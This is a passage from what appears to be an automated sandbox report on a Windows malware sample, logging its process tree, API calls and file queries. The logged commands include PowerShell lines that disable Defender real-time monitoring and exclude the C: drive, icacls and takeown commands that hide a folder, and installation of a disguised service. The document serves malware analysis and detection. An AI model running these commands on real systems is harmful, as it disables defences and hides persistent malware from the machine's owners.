                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $TrueJump to behavior
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: 31_2_000000014000A180 GetProcessHeap,HeapAlloc,GetCommandLineW,_snwprintf_s,ShellExecuteExW,GetProcessHeap,HeapFree,31_2_000000014000A180
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $TrueJump to behavior
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath c:\Jump to behavior
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\programdata\ru.bat" "Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K "c:\programdata\st.bat"Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq Superfetch.exe" Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I /N "Superfetch.exe"Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\takeown.exe takeown /f c:\windows\tasksJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe TIMEOUT /T 3 /NOBREAKJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $TrueJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -ExclusionPath c:\Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "*S-1-1-0:(R,REA,RA,RD)" "*S-1-5-7:(R,REA,RA,RD)"Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "SYSTEM:(R,REA,RA,RD)"Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "Administrators:(R,REA,RA,RD)"Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "Users:(R,REA,RA,RD)"Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "user:(R,REA,RA,RD)"Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "user:(R,REA,RA,RD)"Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "EVERYONE:(R,REA,RA,RD)"Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe TIMEOUT /T 3 /NOBREAKJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ProgramData\migrate.exe c:\programdata\migrate.exe -p4432Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe TIMEOUT /T 3 /NOBREAKJump to behavior
                                  Source: C:\ProgramData\migrate.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\windows\tasks\run.bat" "
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe TIMEOUT /T 1 /NOBREAK
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Tasks\Wmiic.exe "C:\windows\tasks\wmiic.exe" install WMService IntelConfigService.exe
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe TIMEOUT /T 1 /NOBREAK
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Tasks\Wmiic.exe "C:\windows\tasks\wmiic" start WMService
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe TIMEOUT /T 2 /NOBREAK
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net start WMService
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Tasks\1.exe "C:\windows\tasks\1.exe"
                                  Source: C:\Windows\Tasks\Wrap.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Windows\Tasks\ApplicationsFrameHost.exe" --daemonized
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\Tasks /deny "user-PC$:(R,REA,RA,RD)"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\Tasks /deny "Users:(R,REA,RA,RD)"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\Tasks /deny "Administrators:(R,REA,RA,RD))"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Tasks\ApplicationsFrameHost.exe C:\Windows\Tasks\ApplicationsFrameHost.exe --daemonized
                                  Source: C:\Windows\Tasks\MSTask.exeProcess created: C:\Windows\Tasks\MSTask.exe C:\Windows\Tasks\MSTask.exe
                                  Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 start WMService
                                  Source: C:\Windows\Tasks\1.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Windows\mJTDsOcOsyMzGWVl2p4lWXwUrl0TR0B.vbe"
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\fwJLoWFGhpY.bat" "
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Bridgeprovider.exe "C:\Windows/Bridgeprovider.exe"
                                  Source: C:\Windows\Bridgeprovider.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\214ckojv\214ckojv.cmdline"
                                  Source: C:\Windows\Bridgeprovider.exeProcess created: unknown unknown
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: unknown unknown
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: 31_2_000000014000A050 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,31_2_000000014000A050
                                  Source: migrate.exe, 0000001A.00000003.1846671612.000000000778E000.00000004.00000020.00020000.00000000.sdmp, IntelConfigService.exe, 00000027.00000000.1896368978.00007FF7555AB000.00000002.00000001.01000000.0000000B.sdmp, Superfetch.exe, 00000037.00000000.1912951028.00007FF6384CB000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeCode function: 0_2_0088F654 cpuid 0_2_0088F654
                                  Source: C:\Users\user\Desktop\IYXE4Uz61k.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_0088AF0F
                                  Source: C:\ProgramData\migrate.exeCode function: GetLocaleInfoW,GetNumberFormatW,26_2_0012AF0F
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: GetLocaleInfoA,31_2_00000001400245E8
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: GetLocaleInfoA,37_2_00000001400245E8
                                  Source: C:\Windows\Tasks\Wrap.exeCode function: GetLocaleInfoW,42_2_00007FF726D107E4
                                  Source: C:\Windows\Tasks\Wrap.exeCode function: EnumSystemLocalesW,42_2_00007FF726D070EC
                                  Source: C:\Windows\Tasks\Wrap.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,42_2_00007FF726D100E4
                                  Source: C:\Windows\Tasks\Wrap.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,42_2_00007FF726D10598
                                  Source: C:\Windows\Tasks\Wrap.exeCode function: try_get_function,GetLocaleInfoW,42_2_00007FF726D0766C
                                  Source: C:\Windows\Tasks\Wrap.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,42_2_00007FF726D10B18
                                  Source: C:\Windows\Tasks\Wrap.exeCode function: EnumSystemLocalesW,42_2_00007FF726D10500
                                  Source: C:\Windows\Tasks\Wrap.exeCode function: EnumSystemLocalesW,42_2_00007FF726D10430
                                  Source: C:\Windows\Tasks\Wrap.exeCode function: GetLocaleInfoW,42_2_00007FF726D109EC
                                  Source: C:\Windows\Tasks\Wrap.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,42_2_00007FF726D1093C
                                  Source: C:\Windows\Tasks\1.exeCode function: GetLocaleInfoW,GetNumberFormatW,60_2_003FAF0F
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
